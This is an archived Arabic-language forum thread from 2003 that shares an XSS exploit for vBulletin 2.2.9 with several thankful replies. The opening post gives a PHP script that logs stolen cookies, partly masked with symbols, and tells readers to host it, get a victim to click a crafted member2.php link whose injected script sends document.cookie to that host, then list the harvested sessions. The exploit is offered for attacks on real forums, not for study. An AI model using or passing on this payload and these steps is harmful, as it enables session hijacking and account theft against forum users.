المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة في منتدى vBulletin 2.2.9 ... ][ ثالث منتدا عربي يطرح هاذه الثغره][

قبلة الموت
25-02-2003, 10:03
بسم الله الرحمن الرحيم


هذه الثغرة خطيرة جدا وتؤدي بحاية المنتديات vBulletin 2.2.9....


المهم شرحها كالتالي:

1- انسخ الكود واحفظه بالمفكرة بامتداد php





PHP:

--------------------------------------------------------------------------------

<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's &@#&@#&@#&@#&@#&@#s and storing it into a log file.

// Variables:

$LogFile = "&@#&@#&@#&@#&@#&@#s.Log";

// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {

$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/

Switch ($HTTP_GET_VARS['Action']) {
Case "Log":

$Data = $HTTP_GET_VARS['&@#&@#&@#&@#&@#&@#'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");

Print ("<B>.:: Options</B>\n");
Print ("\n");

If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}

Print ("o Download Log : " . $Link['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");

While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}

Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>

--------------------------------------------------------------------------------






2- ارفع الملف لموقع يدعم php
3- اجعل الضحية يضغط على هذا اللينك
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
واستبدال [script code]
بهذا
<Script>location='Http://[مكان الملف الذي تم تحميله]?Action=Log&&@#&@#&@#&@#&@#&@#='+(document.&@#&@#&@#&@#&@#&@#);</Script>
4- إذهب ألى هذا العنوان
Http:// مكان الملف الذي تم تحميله ?Action=List




منقوووووووووووووووووووووووووووول ....
إلكترون
04-08-2003, 02:47
الله يعطيك العافية على هذا الموضوع ) > ثغرة في منتدى vBulletin 2.2.9 ... ][ ثالث منتدا عربي يطرح هاذه الثغره][
إلكترون
04-08-2003, 03:02
الله يعطيك العافية على شرح> ثغرة في منتدى vBulletin 2.2.9 ... ][ ثالث منتدا عربي يطرح هاذه الثغره][
مُجَاهِد
04-08-2003, 06:16
كاتب الرسالة الأصلية : إلكترون
الله يعطيك العافية على هذا الموضوع ) > ثغرة في منتدى vBulletin 2.2.9 ... ][ ثالث منتدا عربي يطرح هاذه الثغره][
shark_lips
04-08-2003, 07:13
مشكور اخوي القرصان على الثغرة و ان شاء الله ما حدا يستغلها ضد اخواننا المسلمين و العرب
الله يعطيك العافية